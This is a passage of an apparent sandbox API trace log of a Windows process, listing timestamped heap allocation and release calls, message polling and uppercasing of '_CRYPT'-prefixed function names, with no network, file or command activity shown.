wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0239.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55148 [0239.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0239.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0239.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0239.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0239.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0239.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0239.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0239.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0239.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0239.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0239.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0239.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0239.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0239.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0239.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0239.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0239.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0239.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15f48) returned 0x2eac1d0 [0239.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0239.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0239.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0239.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0239.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0239.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0239.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0239.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0239.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0239.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0239.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0239.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0239.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15f48) returned 0x2ec2120 [0239.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eac1d0 | out: hHeap=0x970000) returned 1 [0239.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0239.006] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0239.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0239.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0239.006] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0239.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0239.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0239.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0239.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0239.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0239.006] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0239.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0239.006] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0239.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0239.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0239.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0239.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0239.006] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0239.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042d8 [0239.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0239.006] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0239.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0239.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0239.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0239.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0239.007] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0239.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0239.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0239.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0239.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0239.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0239.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0239.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0239.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0239.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0239.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0239.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0239.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0239.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0239.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0239.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0239.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0239.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0239.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0239.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0239.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0239.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0239.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0239.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0239.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0239.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0239.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0239.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0239.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0239.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0239.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0239.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0239.008] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0239.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0239.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0239.008] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0239.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0239.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0239.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0239.008] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0239.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0239.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0239.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0239.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0239.008] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0239.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0239.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0239.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0239.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0239.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0239.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0239.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0239.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0239.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0239.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0239.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0239.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0239.009] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0239.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0239.009] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0239.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0239.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0239.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0239.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0239.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0239.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0239.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0239.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0239.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0239.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0239.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0239.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0239.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0239.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15f48) returned 0x2eac1d0 [0239.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0239.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0239.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15f48) returned 0x2ed8070 [0239.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0239.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0239.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eac1d0 | out: hHeap=0x970000) returned 1 [0239.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0239.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0239.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0239.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0239.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0239.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15f48) returned 0x2eac1d0 [0239.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed8070 | out: hHeap=0x970000) returned 1 [0239.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0239.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0239.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15f48) returned 0x2ed8070 [0239.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eac1d0 | out: hHeap=0x970000) returned 1 [0239.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0239.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0239.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0239.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0239.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0239.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0239.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0239.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0239.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0239.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0239.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0239.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0239.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0239.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e96280 | out: hHeap=0x970000) returned 1 [0239.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0239.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0239.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0239.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0239.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0239.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0239.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0239.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0239.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0239.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0239.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0239.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0239.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0239.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0239.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0239.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0239.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0239.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0239.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0239.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0239.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0239.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0239.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0239.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ec2120 | out: hHeap=0x970000) returned 1 [0239.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0239.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0239.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0239.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0239.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0239.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0239.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0239.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0239.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0239.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0239.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0239.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0239.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0239.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0239.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0239.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0239.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0239.067] HeapFree 